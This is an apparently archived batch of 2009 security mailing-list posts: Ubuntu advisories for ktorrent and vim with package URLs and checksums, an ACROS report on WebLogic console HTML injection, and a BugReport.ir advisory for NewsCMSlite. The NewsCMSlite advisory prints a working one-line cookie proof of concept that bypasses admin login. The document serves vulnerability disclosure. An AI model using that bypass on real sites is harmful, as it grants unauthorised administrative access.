English | Deutsch | Español | Português
 UserID:
 Passwd:
new user
 About:   Dedicated  | Advanced  | Standard  | Recurring  | No Risk  | Desktop  | Basic  | Single  | Security Seal  | FAQ
  Price/Feature Summary  | Order  | New Vulnerabilities  | Confidentiality  | Vulnerability Search
 Vulnerability   
Search   
    Search 143769 CVE descriptions
and 71225 test descriptions,
access 10,000+ cross references.
Tests   CVE   All  

===========================================================
Ubuntu Security Notice USN-711-1           January 26, 2009
ktorrent vulnerabilities
CVE-2008-5905, CVE-2008-5906
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  ktorrent                        2.2.1-0ubuntu3.1

Ubuntu 8.04 LTS:
  ktorrent                        2.2.5-0ubuntu1.1

Ubuntu 8.10:
  ktorrent                        3.1.2+dfsg.1-0ubuntu2.1

After a standard system upgrade you need to restart KTorrent to effect
the necessary changes.

Details follow:

It was discovered that KTorrent did not properly restrict access when using the
web interface plugin. A remote attacker could use a crafted http request and
upload arbitrary torrent files to trigger the start of downloads and seeding.
(CVE-2008-5905)

It was discovered that KTorrent did not properly handle certain parameters when
using the web interface plugin. A remote attacker could use crafted http
requests to execute arbitrary PHP code. (CVE-2008-5906)


Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.1-0ubuntu3.1.diff.gz
      Size/MD5:     8139 542d145b17f4c93e90358305f5082892
    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.1-0ubuntu3.1.dsc
      Size/MD5:      679 5d731774f0370fa9347ff1d4a9fe59b3
    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.1.orig.tar.gz
      Size/MD5:  3763678 229a0615d9252510d9387079dd5bd86d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.1-0ubuntu3.1_amd64.deb
      Size/MD5:  2809826 64590eb7d61058feffe16b0c05c462de

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.1-0ubuntu3.1_i386.deb
      Size/MD5:  2764082 0e1d642f8f86576da7aadb1ba5915993

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/k/ktorrent/ktorrent_2.2.1-0ubuntu3.1_lpia.deb
      Size/MD5:  2769980 979fbc6391793dd1b976b555614b8125

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.1-0ubuntu3.1_powerpc.deb
      Size/MD5:  2912698 5c0baa03be10092f5f9dae0ec33cf050

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.1-0ubuntu3.1_sparc.deb
      Size/MD5:  2764418 71d8cf3eb924098584948847752a69e7

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.5-0ubuntu1.1.diff.gz
      Size/MD5:     8186 887b90cfe0b14d6e654edf5f83d443a1
    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.5-0ubuntu1.1.dsc
      Size/MD5:      679 1cf90260c7bb419ba83f280e0c242c1e
    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.5.orig.tar.gz
      Size/MD5:  3841204 f5cd0430250317eff85d8356d65c0a6f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.5-0ubuntu1.1_amd64.deb
      Size/MD5:  2812314 a60c001b92052ac0d269c894f4bafa7c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.2.5-0ubuntu1.1_i386.deb
      Size/MD5:  2749174 361a62003fe4029dd48b007f05a18848

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/k/ktorrent/ktorrent_2.2.5-0ubuntu1.1_lpia.deb
      Size/MD5:  2762832 e458e9a11bf9d2db72c8af4d89936241

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/k/ktorrent/ktorrent_2.2.5-0ubuntu1.1_powerpc.deb
      Size/MD5:  2894978 935494d19c317011e02041b204d042a5

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/k/ktorrent/ktorrent_2.2.5-0ubuntu1.1_sparc.deb
      Size/MD5:  2744550 5a1f3871c1a972155efcc1a77cac2788

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_3.1.2+dfsg.1-0ubuntu2.1.diff.gz
      Size/MD5:    28491 2dfc78827267f8a0316f7b871a3c5795
    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_3.1.2+dfsg.1-0ubuntu2.1.dsc
      Size/MD5:     1616 9daa934ea811f90d15aafcb96bcb8b3e
    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_3.1.2+dfsg.1.orig.tar.gz
      Size/MD5:  3243464 d7ec6f8f7a77f9a460c99f9ba1d95cec

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent-dbg_3.1.2+dfsg.1-0ubuntu2.1_amd64.deb
      Size/MD5: 10574990 4039eb82f82e92c60212a4639842fb8e
    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_3.1.2+dfsg.1-0ubuntu2.1_amd64.deb
      Size/MD5:  1876310 7d183d5f936776da921a26eb07852cf9

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent-dbg_3.1.2+dfsg.1-0ubuntu2.1_i386.deb
      Size/MD5: 10462534 b2a3142f8a5a73fac78af5651cb31a68
    http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_3.1.2+dfsg.1-0ubuntu2.1_i386.deb
      Size/MD5:  1872266 7f2002e96efccf24fd12178a0ac2af91

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/k/ktorrent/ktorrent-dbg_3.1.2+dfsg.1-0ubuntu2.1_lpia.deb
      Size/MD5: 10485854 5b8f4fda1bb0b2e797a2b6d59bbe0f1a
    http://ports.ubuntu.com/pool/main/k/ktorrent/ktorrent_3.1.2+dfsg.1-0ubuntu2.1_lpia.deb
      Size/MD5:  1891462 4b37c0d9502c46aa5f55e7cccd35c7b5

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/k/ktorrent/ktorrent-dbg_3.1.2+dfsg.1-0ubuntu2.1_powerpc.deb
      Size/MD5: 11060316 fd33f09a63abe5485884da105fd5de91
    http://ports.ubuntu.com/pool/main/k/ktorrent/ktorrent_3.1.2+dfsg.1-0ubuntu2.1_powerpc.deb
      Size/MD5:  1947996 561ba5edef371c84a165d61a88df0b80

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/k/ktorrent/ktorrent-dbg_3.1.2+dfsg.1-0ubuntu2.1_sparc.deb
      Size/MD5: 10583140 b2957586c0802312c7e837336b2dfc10
    http://ports.ubuntu.com/pool/main/k/ktorrent/ktorrent_3.1.2+dfsg.1-0ubuntu2.1_sparc.deb
      Size/MD5:  1873550 2d38e242cfa474fb4c335a1ae2475482



--=-aTXlzfUR+t95VsDZnaL6
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkl+H9oACgkQLMAs/0C4zNrskgCghLISn54Lf3blialkMRjeMuu6
2A0AoJtB/YrPe9zMvzUHiE4x6ag/snQ9
=/7SX
-----END PGP SIGNATURE-----

--=-aTXlzfUR+t95VsDZnaL6--

From - Tue Jan 27 10:28:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d16
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39299-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id A56BCED746
for <lists@securityspace.com>; Tue, 27 Jan 2009 10:18:48 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0DFCA2376C5; Tue, 27 Jan 2009 08:00:52 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 22482 invoked from network); 27 Jan 2009 04:16:40 -0000
Date: Mon, 26 Jan 2009 21:42:45 -0700
Message-Id: <200901270442.n0R4gjWQ020195@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: riklaunim@gmail.com
To: bugtraq@securityfocus.com
Subject: Re: FUD Forum < 2.7.1 PHP code injection vurnelability
Status:   

It's very old one, and it was fixed at the time of reporting to one of devs.

From - Tue Jan 27 10:38:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d17
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39300-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C0A4DED81B
for <lists@securityspace.com>; Tue, 27 Jan 2009 10:30:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B612723776B; Tue, 27 Jan 2009 08:01:55 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24434 invoked from network); 27 Jan 2009 06:41:34 -0000
Message-ID: <20090127103053.g46pdpfyqsskw44c@mail.amnpardaz.com>
Date: Tue, 27 Jan 2009 10:30:53 +0330
From: admin@bugreport.ir
To: bugtraq@securityfocus.com
Subject: NewsCMSlite Insecure Cookie Handling
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-1;
DelSp="Yes";
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1.2)
Status:   

########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title: NewsCMSlite
# Vendor: http://www.katywhitton.com
# Bug: Insecure Cookie Handling
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_62.htm
###################################################################


####################
- Description:
####################

NewsCMSlite is an easy way to get regularly updated content onto your  
site without the need for programming skills or employing a Web  
Maintenance engineer.

The system allows you to update your news, articles, diary  
etc.dynamically using an Access Database to store the content.

####################
- Vulnerability:
####################

+-->Insecure Cookie Handling

Because of improper access restriction to the administration section,  
It is possible to bypass the authentication mechanism and gain access  
to the

administration section by setting the "loggedIn" cookie to "xY1zZoPQ"



Code Snippet:
/newsadmin.asp #line:73-101

if pageView="login" THEN
' Nothing
ELSE

if (Request.Cookies("loggedIn")="") OR  
(Request.Cookies("loggedIn")<>"xY1zZoPQ") THEN
%>
<p><div align="center">
.
.
.
<%
ELSE
%>
<%if pageView="" THEN

' The User is logged in with permission
' to view the admin section so we
' display the article list and
' options menu

####################
- POC:
####################

javascript:document.cookie = "loggedIn=xY1zZoPQ; path=/"

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources. Edit  
the source code to ensure that inputs are properly sanitized.

####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

From - Tue Jan 27 10:48:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d18
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39301-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 554EBED838
for <lists@securityspace.com>; Tue, 27 Jan 2009 10:41:12 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id A989D237813; Tue, 27 Jan 2009 08:03:06 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29772 invoked from network); 27 Jan 2009 11:30:35 -0000
X-Virus-Scanned: amavisd-new at amis.net
X-Spam-Flag: NO
X-Spam-Score: 0
X-Spam-Level: 
X-Spam-Status: No, score=0 required=5 tests=[none]
From: "ACROS Security" <lists@acros.si>
To: <bugtraq@securityfocus.com>, <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
<cert@cert.org>, <si-cert@arnes.si>
Subject: ACROS Security: HTML Injection in BEA (Oracle) WebLogic Server Console (ASPR #2009-01-27-1)
Date: Tue, 27 Jan 2009 12:48:58 +0100
Message-ID: <77AE4F03AAB94719A1AC2E53121CCF46@acros.si>
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook 11
Thread-Index: AcSxDk/MTeQQ0rekSQ6baZjcw7GpqQ=X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
Status:   

=====[BEGIN-ACROS-REPORT]====
PUBLIC

========================================================================ACROS Security Problem Report #2009-01-27-1
-------------------------------------------------------------------------
ASPR #2009-01-27-1: HTML Injection in BEA WebLogic Server Console
========================================================================
Document ID:     ASPR #2009-01-27-1-PUB
Vendor:          ORACLE (http://www.oracle.com)
Target:          Oracle WebLogic Server 10.0
Impact:          There is an HTML Injection vulnerability in WebLogic
                 Server 10 Administration Console that allows the
                 attacker to gain administrative access to the server.
Severity:        High
Status:          Official patch available, workarounds available
Discovered by:   Sasa Kos of ACROS Security

Current version 
   http://www.acrossecurity.com/aspr/ASPR-2009-01-27-1-PUB.txt


Summary
======
There is an HTML Injection vulnerability in WebLogic Server 10 
Administration Console that allows the attacker to gain administrative 
access to the server. It is possible to craft such URL that will, when 
requested from the server, return a document with arbitrarily chosen HTML 
injected. An obvious use for this type of vulnerability is cross- site 
scripting that can be used, among other things, for obtaining session 
cookies from WebLogic administrators. These cookies, when stolen, provide 
the attacker with administrative access to WebLogic Administration 
Console, compromising the security of the entire web server. 

This vulnerability is exploitable even if the Administration Console is 
only being accessed via HTTPS, and even if the Administrative Port is 
enabled.


Product Coverage
===============
- WebLogic Server 10.0
 
Note: Our tests were only performed on the above product version. Other 
versions may or may not be affected. 


Analysis 
=======
Some URL argument in the WebLogic Server 10 Administration Console is 
not properly sanitized against HTML injection, which allows the attacker 
to introduce additional, malicious HTML to the server's response. The 
most common type of HTML injection is injection of malicious client-side 
script, commonly known as cross-site scripting.

In an actual attack the user would not be required to open URLs specified 
by the attacker. Instead, a malicious web page visited by the logged-in 
WebLogic administrator would mount the entire attack automatically and 
covertly. For instance, a tiny 0x0 pixel iframe could be used for loading 
the URL from the demonstration immediately upon administrator's visit to 
the malicious page, injecting the malicious script to the WebLogic 
server's response. This malicious script would then silently send these 
cookies to the attacker's server, where she could pick them up and use 
them for entering the administrator's session in the Administration 
Console.


Mitigating Factors 
=================
- In order to execute the above attack, the attacker would need to make 
the administrator's browser visit a malicious web page while the 
administrator is logged into the Administration Console. This can be 
achieved using social engineering, network traffic modification or a 
combination of both. 

- If the attacker manages to obtain a valid ADMINCONSOLESESSION cookie 
(and optionally _WL_AUTHCOOKIE_ADMINCONSOLESESSION cookie), these will 
only be useful until the administrator logs out of the Administration 
Console. However, the attacker knowing that might rush to create a new 
administrative user in the console and use that user for WebLogic 
administration after the legitimate administrator has logged off.


Solution 
=======
ORACLE has issued a security bulletin [1] and published a patch which 
fixes this issue.


Workaround 
=========
- WebLogic administrators can be trained not to browse other web pages 
while logged in to the Administration Console. However, since some 
hyperlinks in the console point to servers on the Internet (e.g., 
http://support.bea.com) the attacker could watch the administrator's 
Internet traffic and detect such requests as a strong sign that the 
administrator is currently logged in to the Administration Console. She 
would then slightly modify the Internet server's response so as to include 
the malicious code. Such an attack could only be mounted by attackers 
capable of monitoring and modifying the administrator's Internet traffic 
(most likely an ISP or someone who broke into an ISP). 

- The WebLogic Administration Console can be disabled, which would 
neutralize this vulnerability.



References
=========
[1] Oracle Critical Patch Update Advisory - January 2009 
    http://www.oracle.com/technology/deploy/security/critical-patch-
    updates/cpujan2009.html


Acknowledgments
==============
We would like to acknowledge BEA Systems and Oracle Corporation for 
professional handling of the identified vulnerability.


Contact
======
ACROS d.o.o.
Makedonska ulica 113
SI - 2000 Maribor

e-mail: security@acrossecurity.com
web:    http://www.acrossecurity.com
phone:  +386 2 3000 280
fax:    +386 2 3000 282

ACROS Security PGP Key
   http://www.acrossecurity.com/pgpkey.asc
   [Fingerprint: FE9E 0CFB CE41 36B0 4720 C4F1 38A3 F7DD]

ACROS Security Advisories
   http://www.acrossecurity.com/advisories.htm

ACROS Security Papers
   http://www.acrossecurity.com/papers.htm

ASPR Notification and Publishing Policy
   http://www.acrossecurity.com/asprNotificationAndPublishingPolicy.htm


Disclaimer
=========
The content of this report is purely informational and meant only for the
purpose of education and protection. ACROS d.o.o. shall in no event be
liable for any damage whatsoever, direct or implied, arising from use or
spread of this information. All identifiers (hostnames, IP addresses,
company names, individual names etc.) used in examples and demonstrations
are used only for explanatory purposes and have no connection with any
real host, company or individual. In no event should it be assumed that
use of these names means specific hosts, companies or individuals are
vulnerable to any attacks nor does it mean that they consent to being used
in any vulnerability tests. The use of information in this report is
entirely at user's risk.


Revision History
===============
January 27, 2009: Initial release


Copyright
========
(c) 2009 ACROS d.o.o. Forwarding and publishing of this document is
permitted providing the content between "[BEGIN-ACROS-REPORT]" and
"[END-ACROS-REPORT]" marks remains unchanged.

=====[END-ACROS-REPORT]====
From - Tue Jan 27 10:58:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d19
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39302-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 40BC2ED885
for <lists@securityspace.com>; Tue, 27 Jan 2009 10:53:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7950C237825; Tue, 27 Jan 2009 08:03:29 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31630 invoked from network); 27 Jan 2009 12:27:45 -0000
Subject: [USN-712-1] Vim vulnerabilities
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>,
full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -16
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.74.0.130
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-9GE7RjQnL3MhNgSK5oSw"
Date: Tue, 27 Jan 2009 07:53:00 -0500
Message-Id: <1233060780.19266.2.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.3 
Status:   


--=-9GE7RjQnL3MhNgSK5oSw
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-712-1           January 27, 2009
vim vulnerabilities
CVE-2008-2712, CVE-2008-4101
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  vim                             1:6.4-006+2ubuntu6.2
  vim-runtime                     1:6.4-006+2ubuntu6.2

Ubuntu 7.10:
  vim                             1:7.1-056+2ubuntu2.1
  vim-runtime                     1:7.1-056+2ubuntu2.1

Ubuntu 8.04 LTS:
  vim                             1:7.1-138+1ubuntu3.1
  vim-runtime                     1:7.1-138+1ubuntu3.1

Ubuntu 8.10:
  vim                             1:7.1.314-3ubuntu3.1
  vim-runtime                     1:7.1.314-3ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Jan Minar discovered that Vim did not properly sanitize inputs before invoking
the execute or system functions inside Vim scripts. If a user were tricked
into running Vim scripts with a specially crafted input, an attacker could
execute arbitrary code with the privileges of the user invoking the program.
(CVE-2008-2712)

Ben Schmidt discovered that Vim did not properly escape characters when
performing keyword or tag lookups. If a user were tricked into running specially
crafted commands, an attacker could execute arbitrary code with the privileges
of the user invoking the program. (CVE-2008-4101)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2.diff.gz
      Size/MD5:   199371 085ca7601cc068cc572c8cee1d25529f
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2.dsc
      Size/MD5:     1331 42f100409e8290158363e03eba87126c
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4.orig.tar.gz
      Size/MD5:  5740778 b893e7167089e788091f80c72476f0d3

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-doc_6.4-006+2ubuntu6.2_all.deb
      Size/MD5:  1732888 bcbc824e5296fea0ea3dd16b2ca54bc8
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-runtime_6.4-006+2ubuntu6.2_all.deb
      Size/MD5:  3594550 84cc69c7fd6b266f697d189cd67c1f69

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:    83548 8445c214e8f5d3b04077800b3c795799
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   844928 1bf3bfb3b3552f2b7f77d9250517cbed
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:    70034 7c8e29ed88bde4310459b8adfa6a5243
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   444484 99bd94b62dfb322a66dc1c1a98ef4efb
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   664378 f99c5f44f075e507727cfde6e4f4ac5c
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   842724 3121ac81e306aca18d1ce7a8de71ba9e
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   846792 705dcb476de0bb335ffdf74f7f0596a0
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   842742 98bd00409e7bc852a53ecc019ee89b28
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   838130 6e1b1064fb3aa016ba69fc77b6be912b
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   800738 708dfae6260edef8c7dcc5f8d4cf9c81

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:    83114 9831f107a9a9b5544265e2ab53eb5afb
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   713796 32f00306228eecffa22a77de84ae0949
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:    70036 ffca389f01faaaf229ed4a016d37274d
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   366068 76ea071f100dcad8de93b685b278dcf5
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   555212 34446768f4d4bf93e189e9d98752d9a6
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   711754 489a955d8ee4716063a3d8cea4499584
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   718432 5e3a38e1f487af57947bd38d9a0b6bc8
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   711776 5d4887649de172dec2ac677202ab327b
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   707540 3a2500bf0437de7d07a1e503e6e54cec
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   671316 ddf4437a7aa1d91c99f9233be933e81a

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:    83524 b1350ec11eab7e0a8c7afb049eff2f5c
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   804090 933bd849bf1d0592dd58a90f8e7a18ab
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:    70040 0676d5dcf3f7e0076b861f4155fc524e
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   419552 33840a53481dcd63a1101fef3cfe30f9
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   631936 35786da23d1d301ca0960ddee36d35d2
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   801918 c98a917f381fe65b102e8ea39018c96d
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   809022 09ceb2a4de5060527f9a7cf44645afb6
